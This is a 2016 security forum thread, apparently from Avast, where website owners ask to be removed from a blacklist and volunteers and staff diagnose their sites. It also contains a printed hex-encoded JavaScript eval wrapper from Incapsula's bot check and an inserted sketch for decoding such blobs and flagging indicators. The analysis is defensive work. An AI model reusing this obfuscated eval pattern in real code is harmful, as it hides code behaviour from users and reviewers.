Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 01, 2016, 02:29:56 PM
Yes and it is not only you.
As a website owner/ website admin you also have a responsibility towards the visitors of your website.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Shone on July 01, 2016, 04:06:42 PM
Quote
Yes and it is not only you.
As a website owner/ website admin you also have a responsibility towards the visitors of your website.

polonus

All In One WP Security & Firewall plugin. Do you recommend it?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 01, 2016, 04:25:41 PM
Hi Shone,

First pay attention to the kernel software that is often fully bug-tested, when updated and fully patched.
Kernel CMS is safe, providing the general settings are right. We discussed that.
The insecurity starts with outdated and non-patched plug-ins, even left code is worse.
That plug-in may be OK when the other conditions are also met.
Mind no plug-in is always completely safe. As is demonstrated by the fact,
that this was detected in that plug-in software quite a while ago:
https://wptavern.com/serious-flaw-discovered-in-the-all-in-one-wordpress-security-and-firewall-plugin

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Shone on July 01, 2016, 04:40:13 PM
thanks polonus  :D
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 04, 2016, 09:20:37 AM
Yup, ribastiendaonline.com was blacklisted, it even appeared in a blogpost: https://blog.mxlab.eu/2016/05/06/new-javascript-malware-upcoming-payment-1-month-notice/
I am now unblocking it, hoping that you got rid of the insecurities that caused the infection ;)
Title: Re: How to remove my website from your blacklist?
Post by: Nr_ on July 08, 2016, 09:17:45 PM
Hi.

A number of users on http://dgfamily.77forum.com/ have reported that Avast is blocking them from using the site. The site doesn't appear on any other blacklists according to both virustotal and urlvoid and I have no reason otherwise to believe that the site has been compromised.

Is it possible that the site could have been falsely flagged, and in that case, would it be possible for the block to be lifted?

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 08, 2016, 09:34:59 PM
I can access dgfamily.77forum.com without any problems. Do you have a printscreen or something that could point us to the right direction?
Title: Re: How to remove my website from your blacklist?
Post by: Nr_ on July 08, 2016, 10:08:23 PM
Interesting. I'll ask around and see if the users that reported the issues can provide a screenshot or two. Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: Nr_ on July 09, 2016, 07:30:26 AM
I heard back from one person so far and it appears that it's the forum theme that's causing issues. http://puu.sh/pV5ID.png
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 09, 2016, 08:07:45 AM
The "hitsk.in" was a false positive, and was fixed a couple of hours after the detection was released. Everything should be okay now. If your users are still seeing popups, advise them to update Avast ;)
Title: Re: How to remove my website from your blacklist?
Post by: Nr_ on July 09, 2016, 09:44:02 AM
Will do. Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: chowkaideng on July 12, 2016, 07:08:25 AM
Hi! One of my clients has his URL http://ambit.com.mx blacklisted by Avast. We have reported it as a false positive several times, but it always keeps being blocked. Right now we are also using Cloudflare.
What should we do in order to remove the URL from this black list?

I've scanned it with VirusTotal and other tools, and it seems to be clear:
https://www.virustotal.com/en/url/1a6caf38607c4d7ddac15120b1175fb6e4c35f311c7884022dfffa9dbcf56b0d/analysis/

Thanks a lot in advance!
Dan
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on July 12, 2016, 07:23:24 AM
-> https://sitecheck.sucuri.net/results/ambit.com.mx/
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 12, 2016, 06:28:53 PM
Cannot see the site is blocked by avast nor flagged by AOS!
What you are seeing below is content generated by Incapsula not actual content from your site. Incapsula is blocking you from scanning your own site!
https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fambit.com.mx%2F&ref_sel=GSP2&ua_sel=ff&fs=1
5 issues here: https://mxtoolbox.com/domain/ambit.com.mx/
Checking for cloaking
There is a difference of 6 bytes between the version of the page you serve to Chrome and the version you serve to GoogleBot. This probably means some code is running on your site that's trying to hide from browsers but make Google think there's something else on the page. show.
Code:
var z="";var b="7472797B766172207868723B76617220743D6E6577204461746528292E67657454696D6528293B766172207374617475733D227374617274223B7661722074696D696E673D6E65772041727261792833293B77696E646F772E6F6E756E6C6F61643D66756E6374696F6E28297B74696D696E675B325D3D22723A222B286E6577204461746528292E67657454696D6528292D74293B646F63756D656E742E637265617465456C656D656E742822696D6722292E7372633D222F5F496E63617073756C615F5265736F757263653F4553324C555243543D363726743D373826643D222B656E636F6465555249436F6D706F6E656E74287374617475732B222028222B74696D696E672E6A6F696E28292B222922297D3B69662877696E646F772E584D4C4874747052657175657374297B7868723D6E657720584D4C48747470526571756573747D656C73657B7868723D6E657720416374697665584F626A65637428224D6963726F736F66742E584D4C4854545022297D7868722E6F6E726561647973746174656368616E67653D66756E6374696F6E28297B737769746368287868722E72656164795374617465297B6361736520303A7374617475733D6E6577204461746528292E67657454696D6528292D742B223A2072657175657374206E6F7420696E697469616C697A656420223B627265616B3B6361736520313A7374617475733D6E6577204461746528292E67657454696D6528292D742B223A2073657276657220636F6E6E656374696F6E2065737461626C6973686564223B627265616B3B6361736520323A7374617475733D6E6577204461746528292E67657454696D6528292D742B223A2072657175657374207265636569766564223B627265616B3B6361736520333A7374617475733D6E6577204461746528292E67657454696D6528292D742B223A2070726F63657373696E672072657175657374223B627265616B3B6361736520343A7374617475733D22636F6D706C657465223B74696D696E675B315D3D22633A222B286E6577204461746528292E67657454696D6528292D74293B6966287868722E7374617475733D3D323030297B706172656E742E6C6F636174696F6E2E72656C6F616428297D627265616B7D7D3B74696D696E675B305D3D22733A222B286E6577204461746528292E67657454696D6528292D74293B7868722E6F70656E2822474554222C222F5F496E63617073756C615F5265736F757263653F535748414E45444C3D3837303134333132313538363435373030302C3434383439363830393830333130313834332C373535323532393437313138393835313037372C3331343939222C66616C7365293B7868722E7365
6E64286E756C6C297D63617463682863297B7374617475732B3D6E6577204461746528292E67657454696D6528292D742B2220696E6361705F6578633A20222B633B646F63756D656E742E637265617465456C656D656E742822696D6722292E7372633D222F5F496E63617073756C615F5265736F757263653F4553324C555243543D363726743D373826643D222B656E636F6465555249436F6D706F6E656E74287374617475732B222028222B74696D696E672E6A6F696E28292B222922297D3B";for (var i=0;i<b.length;i+=2){z=z+parseInt(b.substring(i, i+2), 16)+",";}z = z.substring(0,z.length-1); eval(eval('String.fromCharCode('+z+')'));})();
iFrame detected:
Quote
<iframe style="display:none;visibility:hidden;" src="//content.incapsula.com/jsTest.html" id="gaIframe"></iframe>

polonus
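
The wrapper quoted in the post above turns each pair of hex digits into a character code and passes the result to eval. The sketch below is an added example, not part of the original post: it decodes such a blob statically (nothing is evaluated) and lists what the decoded script touches. The sample blob, the `/_Example_Resource` path and all function names are constructed for illustration.

```javascript
// Static triage of a "hex pairs -> String.fromCharCode -> eval" wrapper.
// The script is only ever treated as text; it is never executed.

// Constructed sample (NOT the blob from the post), encoded the same way.
const SAMPLE_PLAIN =
  'try{var xhr=new XMLHttpRequest();xhr.open("GET","/_Example_Resource?id=1",false);' +
  'xhr.send(null);parent.location.reload()}' +
  'catch(c){document.createElement("img").src="/_Example_Resource?e="+c}';
const SAMPLE_HEX = Buffer.from(SAMPLE_PLAIN, 'latin1').toString('hex').toUpperCase();
const SAMPLE_WRAPPER =
  'var z="";var b="' + SAMPLE_HEX + '";for (var i=0;i<b.length;i+=2)' +
  '{z=z+parseInt(b.substring(i, i+2), 16)+",";}z = z.substring(0,z.length-1); ' +
  "eval(eval('String.fromCharCode('+z+')'));";

// Find quoted runs of hex digits. Whitespace inside the quotes is tolerated
// because copied blobs are often wrapped across lines, as in the post.
function extractHexBlobs(source, minLength = 32) {
  const blobs = [];
  const re = /["']([0-9A-Fa-f\s]+)["']/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    const hex = m[1].replace(/\s+/g, '');
    if (hex.length >= minLength && hex.length % 2 === 0) blobs.push(hex);
  }
  return blobs;
}

// Same transformation the wrapper performs, minus the eval.
function decodeHex(hex) {
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.substring(i, i + 2), 16));
  }
  return out;
}

// Behaviours worth noting when deciding whether the decoded script is benign.
const INDICATORS = [
  { name: 'xhr', re: /XMLHttpRequest|ActiveXObject/ },
  { name: 'dynamic-element', re: /document\.createElement/ },
  { name: 'reload-or-redirect', re: /location\.(reload|replace|href)/ },
  { name: 'nested-eval', re: /\beval\s*\(/ },
  { name: 'document-write', re: /document\.write/ },
];

// Quoted strings that look like request targets (site-relative or absolute).
function extractTargets(script) {
  const targets = [];
  const re = /["'](\/[^"']*|https?:\/\/[^"']*)["']/g;
  let m;
  while ((m = re.exec(script)) !== null) targets.push(m[1]);
  return targets;
}

// Decode every blob in the source and summarise it for a human reviewer.
function analyze(source) {
  return extractHexBlobs(source).map((hex) => {
    const decoded = decodeHex(hex);
    return {
      decoded,
      indicators: INDICATORS.filter((i) => i.re.test(decoded)).map((i) => i.name),
      targets: extractTargets(decoded),
    };
  });
}

for (const report of analyze(SAMPLE_WRAPPER)) {
  console.log('decoded   :', report.decoded);
  console.log('indicators:', report.indicators.join(', '));
  console.log('targets   :', report.targets.join(', '));
}
```

Reading the decoded text and its request targets shows whether the script only talks to the site's own protection service or reaches elsewhere, which is the question a reviewer has to answer before calling the obfuscation benign.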
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 13, 2016, 11:07:50 AM
I did not find anything malicious on the site, so I unblocked it. However, pay attention to insecurities/vulnerabilities other users pointed out, as it might mean an infection (and adding to the blacklist again) in the future.
Title: Re: How to remove my website from your blacklist?
Post by: chowkaideng on July 13, 2016, 04:05:39 PM
Thanks!
Yes, we are throwing away that old site and setting up a new one, even on a different server :)

Quote
I did not find anything malicious on the site, so I unblocked it. However, pay attention to insecurities/vulnerabilities other users pointed out, as it might mean an infection (and adding to the blacklist again) in the future.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on July 14, 2016, 10:48:42 AM
That is a good start, but keep in mind that a good start doesn't always mean the end is good as well.
Keep software updated and keep checking the pages on a regular basis ;)
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on July 14, 2016, 11:08:57 AM
Quote
Keep software updated and keep checking the pages on a regular basis
Or buy website monitoring / security from Sucuri > https://sucuri.net/

Title: Re: How to remove my website from your blacklist?
Post by: Michael925 on July 16, 2016, 12:35:28 AM
Hello,

Our website is reported as being in the avast blacklist. Here is the domain name: multiencargos.com

We are sure that our website is clean, therefore we would like you to take a look at it and remove it from your blacklist.

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on July 16, 2016, 12:45:12 AM
Quote
Hello,

Our website is reported as being in the avast blacklist. Here is the domain name: multiencargos.com

We are sure that our website is clean, therefore we would like you to take a look at it and remove it from your blacklist.

Thanks.
Blacklisted and Dr.Web say: known infection source
https://www.virustotal.com/en/url/68c1c765c47f3149d9f14977c2405b56e8ef5a3035ada832e59e4cc41f741674/analysis/1468622414/

IP history > multiple domains on same IP and many are blacklisted
https://www.virustotal.com/en/ip-address/66.96.149.32/information/


Title: Re: How to remove my website from your blacklist?
Post by: Michael925 on July 16, 2016, 01:27:39 AM
Quote
Hello,

Our website is reported as being in the avast blacklist. Here is the domain name: multiencargos.com

We are sure that our website is clean, therefore we would like you to take a look at it and remove it from your blacklist.

Thanks.
Blacklisted and Dr.Web say: known infection source
https://www.virustotal.com/en/url/68c1c765c47f3149d9f14977c2405b56e8ef5a3035ada832e59e4cc41f741674/analysis/1468622414/

IP history > multiple domains on same IP and many are blacklisted
https://www.virustotal.com/en/ip-address/66.96.149.32/information/

We have fully checked all website files by Dr. Web scanner (online and offline) - all clean, so there is wrong info
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on July 16, 2016, 06:37:41 AM
Blacklisted and spreading malware :
http://zulu.zscaler.com/submission/show/099e2e353345bf1159f42067580aa6c4-1468643379
http://www.web-malware-removal.com/website-malware-virus-scanner/?url=multiencargos.com
http://www.siteadvisor.com/sites/multiencargos.com

Blacklisted :
https://www.virustotal.com/en/url/68c1c765c47f3149d9f14977c2405b56e8ef5a3035ada832e59e4cc41f741674/analysis/1468643404/
http://www.urlvoid.com/scan/multiencargos.com/

Blacklisted IP :
http://urlquery.net/report.php?id=1468642423543

Blacklisted and likely compromised :
https://sitecheck.sucuri.net/results/multiencargos.com#sitecheck-details

And as has been said, a huge amount of blacklisted domains on that IP.
It should stay blocked.

The solution is to remove the malicious file(s) and get dedicated hosting at a company that takes security seriously.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 16, 2016, 08:54:00 AM
Hi, the detection was turned off 2 days ago. Please do pay attention to what others are saying and secure your domain.
Title: Re: How to remove my website from your blacklist?
Post by: marc157 on August 18, 2016, 12:14:31 AM
Hello,

My client's URL also appears to be blacklisted by Avast. The Web Shield is reporting URL:Mal on http://www.wireside.com. I've scanned all of the files on the site by downloading them and scanning with Avast, as well as using multiple online malware scanners. I know that the site was previously infected, but is not any longer.

I scanned the site with VirusTotal and it reported that Quttera was reporting it as a malicious site (https://www.virustotal.com/en/url/ae6b38940c9dd514eb08a34dfce2cc73c1675b3d9d6a93e267a03aa5edf6e5eb/analysis/1471458795/), however when I scanned with Quttera, it was reported as not malicious: https://quttera.com/detailed_report/wireside.com.

Can you please check to see if wireside.com can be removed from the Avast blacklist if it is on one, or advise on what the problem is.

Thank you!
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on August 18, 2016, 09:35:16 AM
VirusTotal does not scan sites.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on August 18, 2016, 09:37:29 AM
I am happy to hear the infection has been healed, I am unblocking wireside[.]com now!
Title: Re: How to remove my website from your blacklist?
Post by: jonas.klimes on August 20, 2016, 12:09:27 PM
Hello,

The website of our NGO Na Den, z. s. - www.na-den.cz was infected by some virus via Wordpress that was not updated.

I removed the infected wordpress installation and it is clean now. Could you please review our site and remove it from your blacklist?

Thank you.

Best Regards,
Jonas Klimes
Title: Re: How to remove my website from your blacklist?
Post by: cernik on August 20, 2016, 01:44:27 PM
www.na-den.cz unblocked
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 20, 2016, 02:11:53 PM
Site advisor still blocks as risky, but that may be outdated.

pol
Title: Re: How to remove my website from your blacklist?
Post by: doctorgester on August 27, 2016, 03:18:21 PM
Hello!

My website hxtp://dg-pic.tk/ never contained any malware. It's a website on top of a custom-built server providing an opensource desktop application: https://github.com/DoctorGester/dg-pic

It should be totally clean! Bitdefender also reports a malware and I contacted their support to resolve this.

Thanks in advance!

Title: Re: How to remove my website from your blacklist?
Post by: Pondus on August 27, 2016, 03:44:11 PM
@doctorgester  I guess the block is a result of using afraid.org as host

avast is notified so you should receive a why ... maybe not today   ;)



Title: Re: How to remove my website from your blacklist?
Post by: Eddy on August 27, 2016, 04:04:07 PM
Blacklisting doesn't have to mean that the site is malicious/contains malicious content.

Afraid.org used :
http://toolbar.netcraft.com/site_report?url=dg-pic.tk
From avast (for the free service from afraid):
Quote
Any domain hosted on afraid.org can be used by other persons for dns hosting without your control. When nobody has control on subdomains of domain (DNS hijacking), we block the whole domain in order to protect our users.

Suspicious :
https://www.virustotal.com/en/url/2b107625d57f9e60cf2b55a93ec3ae2393915f0820f25fac08c285c416f0a3a6/analysis/1472305053/

Blacklisted domains on that ASN :
http://urlquery.net/report.php?id=1472305106220
http://urlquery.net/report.php?id=1472305272305

Vulnerable library detected :
http://retire.insecurity.today/#!/scan/a8e8384209b55f57628a33fbce491fa30eca1259c94a2ca257f0bf7e02ae11e1

Several risks detected :
http://zulu.zscaler.com/submission/show/2449d900f6325cbf404929c2c8ad0f51-1472305015

Insecure headers :
https://securityheaders.io/?followRedirects=on&hide=on&q=dg-pic.tk

Really bad hoster :
http://sitevet.com/db/asn/AS24940
Title: Re: How to remove my website from your blacklist?
Post by: doctorgester on August 27, 2016, 04:26:06 PM
Right. So basically I should get rid of afraid DNS and update my jquery lib?
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on August 27, 2016, 04:53:11 PM
That and get a host that is more trusted/takes security seriously.
Title: Re: How to remove my website from your blacklist?
Post by: doctorgester on August 27, 2016, 06:15:02 PM
Can't really switch my host sadly since I'm not using hetzner services directly and it's all paid forward for years.

I've switched DNS, thanks for the heads up!
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on August 29, 2016, 09:45:19 AM
Awesome, I am unblocking dg-pic[.]tk now ;)
Title: Re: How to remove my website from your blacklist?
Post by: sgt39 on September 06, 2016, 07:38:50 PM
we recently heard from one of our users that Avast firewall software has marked one of our news sites as a phishing site www.richmond.com .  I checked all the normal sites

https://www.virustotal.com

http://quttera.com

http://sitecheck.sucuri.net

http://www.urlvoid.com

http://www.mcafee.com/threat-intelligence/domain

http://safeweb.norton.com

http://urlquery.net

site is clean can you let me know what you are seeing or why it would be marked as phishing please. They also mentioned this article specifically http://www.richmond.com/opinion/our-opinion/article_b79cc2b6-8ed5-532c-92eb-4a37e779c433.html but usually the whole site would be marked.  This is a real newspaper site.  Thanks
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on September 06, 2016, 07:46:25 PM
A firewall doesn't block websites unless the user set a rule for it.
Title: Re: How to remove my website from your blacklist?
Post by: DavidR on September 06, 2016, 08:31:16 PM
Quote
A firewall doesn't block websites unless the user set a rule for it.

Being a phishing site detection, it is more likely to be the AOS browser add-on/extension or the web shield rather than the firewall.
Title: Re: How to remove my website from your blacklist?
Post by: sgt39 on September 06, 2016, 09:02:30 PM
looks like it is just this one article and have not heard from any other users either. 

I heard back from this user and he had some good information. On his phone, McAfee site advisor from Verizon gives him an error message when he goes to the article. On his tablet, he went to Richmond.com and searched for the article, found it, clicked on the story and then received a message from Avast. Verizon is his cable provider and he was using Verizon wi-fi on his tablet, but on his phone it was 3G and not wi-fi. He went to his phone again with me on the phone and received the error message. He’s sending a screenshot over and I’ll share.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 06, 2016, 09:48:17 PM
Could have been the tracker.js code that played into this, but let us wait and see.

Furthermore there is code to be retired: http://retire.insecurity.today/#!/scan/248c7657882b00ec1c64112971ec604db852b9a535ba8e5bcfbaac935fc60341

Re on that uri avast webshield flags: -http://www.domxssscanner.com/scan?url=https%3A%2F%2Fwww.richmond.com%2Fopinion%2Four-opinion%2Farticle_b79cc2b6-8ed5-532c-92eb-4a37e779c433.html

The scan has detected some POTENTIAL problems in these external files. First scroll down through the code listed out after the list of links, this is the code returned by the request for the URL you entered and check for any problems. Next, these link(s) will open the individual URL(s) in this tool, check through the code that is returned, compare the code being returned to a known clean copy, etc.

1 -> stats-newyork1.bloxcms dot com/shared-content/stats/common/tracker.js

Redirect OK: -htxps://launch.newsinc.com/143/js/embed.js  benign.

Suspicious: 4711:   < if​rame src="htXps://www.eventbrite.com/countdown-widget?eid=27221648684" frameborder="0" height="400" width="195" marginheight="0" marginwidth="0" scrolling="no" allowtransparency="true"> < / if​rame >

Note: The if​rame above look suspicious! What is being loaded from that src=URL might be OK.

Best candidate for this Webshield detection however is some encrypted content, see: -http://ddecode.com/hexdecoder/?results=b440e9af1b0b1bcdfef40d9b8d650c33
from line 3261 up to 3446 see -> -https://aw-snap.info/file-viewer/?tgt=https%3A%2F%2Fwww.richmond.com%2Fopinion%2Four-opinion%2Farticle_b79cc2b6-8ed5-532c-92eb-4a37e779c433.html&ref_sel=GSP2&ua_sel=ff&fs=1#ln_4711
N.B. unblock above link only when you know what to look for and are sufficiently website security apt.

We should hear from an Avast Team Member the code was just flagged because of the persistent obfuscation or because of the de-obfuscated code being also non-benign aka suspicious/malicious.

I am just a volunteer with quite some experience & relevant knowledge, but unblocking is just for Avast Team Members,
so wait for a reaction by one of them.

polonus (volunteer website analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on September 07, 2016, 09:22:20 AM
I noticed we have indeed blocked richmond[.]com/opinion/our-opinion/article_b79cc2b6-8ed5-532c-92eb-4a37e779c433.html as phishing. This is most likely a False Positive, so I am unblocking it right now ;)
Title: Re: How to remove my website from your blacklist?
Post by: Tomi12 on September 20, 2016, 09:33:32 PM
Hi. I'm getting false malware alert from Avast mobile for my site www.reissussa .fi. Could you remove my site from blacklist?

Tomi Helin
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on September 20, 2016, 09:48:55 PM
1 vulnerable library detected :
http://retire.insecurity.today/#!/scan/740e77c37c2cb26dd18190b5d6feb63cd05cb53cdba67df9c5de171b964e37b6

Insecurities on Wordpress (although it looks like the second one seems an error in the detection) :
The following plugins were detected by reading the HTML source of the WordPress sites front page.
kirki 2.3.2   latest release (2.3.6) Update required
http://kirki.org

siteorigin-panels 2.4.9   latest release (2.4.15) Update required
https://siteorigin.com/page-builder/

Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.
ID   User            Login
1   Tomi             tomi
2   QuidusDemos   quidusdemos

Some problems on that IP :
https://www.virustotal.com/en/ip-address/178.213.233.224/information/
Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 20, 2016, 09:58:20 PM
An addition for the reversed DNS, server DROWN vulnerable: https://test.drownattack.com/?site=n44.netsor.fi

The following domain names are vulnerable to man-in-the-middle attacks. Attackers may be able to impersonate the server and steal or change data.

Anyway, I do not see avast flag the site or blacklist it at the moment.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on September 21, 2016, 08:01:24 AM
Hi Tomi,
I am unblocking reissussa[.]fi now, but please do take care of the vulnerabilities and insecurities others pointed out, or it might be blocked automatically again.
Title: Re: How to remove my website from your blacklist?
Post by: nelsonvogel on September 23, 2016, 03:53:56 AM
Hi, my web site www.sollove.com.br was blocked by avast. All malware was already removed. Can you please remove it from your black list? Thank you
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on September 23, 2016, 04:14:35 AM
Quote
Hi, my web site hxxp:www.sollove.com.br was blocked by avast. All malware was already removed. Can you please remove it from your black list? Thank you


(http://i.imgur.com/PXdUC6r.png)

Hello.

Site was blocked Locky Ransomware

http://urlquery.net/report.php?id=1474596383580

http://zulu.zscaler.com/submission/show/e752da019c6e39f501232179dff5ff06-1474597251

http://zulu.zscaler.com/submission/show/a9bd32356aac84b89e7ffdaa1c34b438-1474597384

Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on September 23, 2016, 09:02:43 AM
I hope the Locky was already removed, and I am removing sollove[.]com.br from our blacklist. Be sure to secure your server better ;)!
Title: Re: How to remove my website from your blacklist?
Post by: jwwdaterd on October 14, 2016, 05:37:32 PM
Tried three times through the false positive report when notified by avast in the past. This has never been resolved. Can you help? I show no reason why it should be reported as blacklisted anywhere. Attachments show urlvoid and virustotal reports. Site is www.mountainskies.com
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on October 14, 2016, 06:32:00 PM
Blacklistings and other problems there :
http://urlquery.net/report.php?id=1476462160807

Phishing detected on that IP :
http://urlquery.net/report.php?id=1476121518113

Really bad IP history :
https://www.virustotal.com/en/ip-address/69.195.124.109/information/

Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.
ID   User            Login
1                      None
2   John Wright   jwwdaterd

Vulnerable libraries :
http://retire.insecurity.today/#!/scan/77dc477b346e64d1b75b79001524cab0f491dc54cdcb22d0d9009edc46f750a6

Advice :
- Solve the mentioned problems
- Get dedicated hosting
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 14, 2016, 06:54:27 PM
Eddy is right, and there is more ....

When we do a DNS report: WARNING: Name servers software versions are exposed:
162.88.60.37: "PowerDNS Authoritative Server 3.4.7 (jenkins@autotest.powerdns.com built 20151103151207 root@autotest.powerdns.com)"
162.88.61.37: "PowerDNS Authoritative Server 3.4.7 (jenkins@autotest.powerdns.com built 20151103151207 root@autotest.powerdns.com)"

Certificate name mismatch and 6 other issues/problems found: https://mxtoolbox.com/domain/www.mountainskies.com/

URLs that redirect found in: -http://www.mountainskies.com/

1: -http://www.teamviewer.com/link/?url=963497&id=1119595237 -> -https://www.teamviewer.com/link/?url=963497&id=1119595237
are these legit: https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fwww.mountainskies.com%2F&ref_sel=GSP2&ua_sel=ff&fs=1

IP history probably is at the base of this blocking, see: https://cymon.io/69.195.124.109

And it is not only avast to alert on this IP, there are other sources as well:
Reporting sources: quttera.com, c-sirt.org, blocklist.de, labs.snort.org, tor.ahbl.org, dnsbl.ahbl.org, openphish.com, virustotal.com, urlquery.net,
google safebrowsing, phishtank, cleanmx-malware, cleanmx-phishing

Conclusion: "da baddie neigbors on that same IP address!"

polonus
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on October 17, 2016, 09:10:21 AM
Yup, we blocked mountainskies[.]com a year ago because of distribution of Angler EK. Since I do not see any evidence of anything malicious going on on that domain, I am unblocking it now ;) Please do pay attention to what others pointed out, though!
Title: Re: How to remove my website from your blacklist?
Post by: John871 on October 28, 2016, 09:31:31 PM
Hi, our web site is http://www.dyslexia-athens.gr/ can you please remove it from blacklist as the web site is clean
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on October 28, 2016, 10:12:26 PM
Quote
Hi, our web site is http://www.dyslexia-athens.gr/ can you please remove it from blacklist as the web site is clean

suspicious > http://www.UnmaskParasites.com/security-report/?page=www.dyslexia-athens.gr

Blacklisted > https://virustotal.com/en/url/23623400ff11dddb6f9b2ab71e492eeba71bc7e81f51bdf661cec1612e06cd03/analysis/1477685430/

Infected > https://sitecheck.sucuri.net/results/www.dyslexia-athens.gr

HTML scan > https://virustotal.com/en/file/e742ef5d5bcb936c26a7e4dd561d33b0eaccaf35a64ae37c0f4433be7ad02b4e/analysis/1477685698/


So website is NOT clean   8)



Title: Re: How to remove my website from your blacklist?
Post by: Eddy on October 28, 2016, 10:18:38 PM
Blacklisted :
http://www.urlvoid.com/scan/dyslexia-athens.gr/
https://www.virustotal.com/en/url/23623400ff11dddb6f9b2ab71e492eeba71bc7e81f51bdf661cec1612e06cd03/analysis/1477685430/

Infected :
https://sitecheck.sucuri.net/results/www.dyslexia-athens.gr

Bad IP history :
https://www.virustotal.com/en/ip-address/198.143.107.188/information/

Malicious javascript :
https://quttera.com/detailed_report/www.dyslexia-athens.gr

Wordpress issue :
Warning Directory Indexing Enabled

Vulnerable library :
http://retire.insecurity.today/#!/scan/88bcf4db9f1ac07b7579851911ef9f4fa1a15f31fa3353c73ceb5d04a95579bc
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 28, 2016, 10:33:32 PM
Additional to what Eddy mentions here Sucuri also gives the known javascript malware.
Details: http://sucuri.net/malware/entry/MW:JS:GEN2?web.js.malware.fake_jquery.003
that Quttera detects twice.
Fortinet's detection alert is mentioned at the VT results: https://www.virustotal.com/nl/url/23623400ff11dddb6f9b2ab71e492eeba71bc7e81f51bdf661cec1612e06cd03/analysis/1477685430/

Three times where the "same origin" rule has been violated and sri-hashes come missing - hence B-Status: https://sritest.io/#report/28c2b871-bb44-49a2-88f6-3ec362423146

Look at jQuery UI sortable for glitches.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on November 02, 2016, 01:10:52 PM
dyslexia-athens[.]gr does not seem to be blocked by Avast now. Post printscreen if the issue persists ;)
Also, we already "solved" this with John871 via PM, I am just posting this for the sake of completeness :)
Title: Re: How to remove my website from your blacklist?
Post by: c.camargo on November 16, 2016, 01:35:41 AM
Hi,

We need your help, our university's page http://www.javeriana.edu.co is being blocked by Avast. We are a University, we aren't a malicious site. Please remove javeriana's site from your blacklist.


Thanks for your help.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on November 16, 2016, 02:32:50 AM
If avast shows URL:Mal it doesn't mean by default that the website is malicious.
It means the IP and/or domain is blocked.
There are multiple reasons why this can happen.

Vulnerable libraries used :
http://retire.insecurity.today/#!/scan/4cb508cd47b15499e452736d45dd3bb4736ea80a4367fdd1a05d62f1ffbe01af

Browser difference and (possible) other problems :
https://www.websicherheit.at/website-malware-viren-scanner/?url=www.javeriana.edu.co

Blacklisted (Phishing) :
http://zulu.zscaler.com/submission/show/0a64e3c36cebe90bedb75c4e0a0667ae-1479259535
http://www.urlvoid.com/scan/javeriana.edu.co/
https://www.virustotal.com/en/url/1ce7893211cfebf3807b09c401a7776c7971ccdf705fbaec08321a2678266444/analysis/1479259573/

Phishing and other problems :
http://urlquery.net/report.php?id=1479259568583

https://www.virustotal.com/en/ip-address/200.3.149.136/information/
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on November 16, 2016, 10:12:36 AM
We have indeed blocked javeriana[.]edu.co/home as it was reported as phishing, from 14.11., 21:21 to 16.11., 03:19 (both CET). It should be okay now ;)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on November 16, 2016, 01:39:40 PM
Good that the website got unblocked now, but the website management should take measures against phishing,
at least log for it.

Also improve the overall security structure, see the mediocre results here:
https://observatory.mozilla.org/analyze.html?host=www.javeriana.edu.co 
Guess a university could perform somewhat better in these respects  ;)

polonus
Title: Re: How to remove my website from your blacklist?
Post by: c.camargo on November 16, 2016, 03:24:54 PM
Hi,

Thanks a lot for your attention and help. we are verifying and taking the correction for these threats.

Best regards,

Title: Re: How to remove my website from your blacklist?
Post by: martinjon on November 29, 2016, 10:27:12 PM
Our Site farmlogix.net has been blacklisted and I have done a lot of 3rd party scanning to see if I can locate an issue but nothing is coming to the fore, can we resolve this.

Title: Re: How to remove my website from your blacklist?
Post by: Eddy on November 29, 2016, 11:18:07 PM
I don't know what scans you have run, but my scans do show issues/problems.

Vulnerable library used :
http://retire.insecurity.today/#!/scan/7a15c56b643ad68ed1b826ea97f000b67a3e3c949ce46ee1c4e4dd9a8ad0c9f5

Blacklisted by McAfee :
http://www.siteadvisor.com/sites/farmlogix.net

Huge amount of malicious (Phishing) activity on that IP :
https://www.virustotal.com/en/ip-address/50.62.108.1/information/

Blacklistings and other problems there :
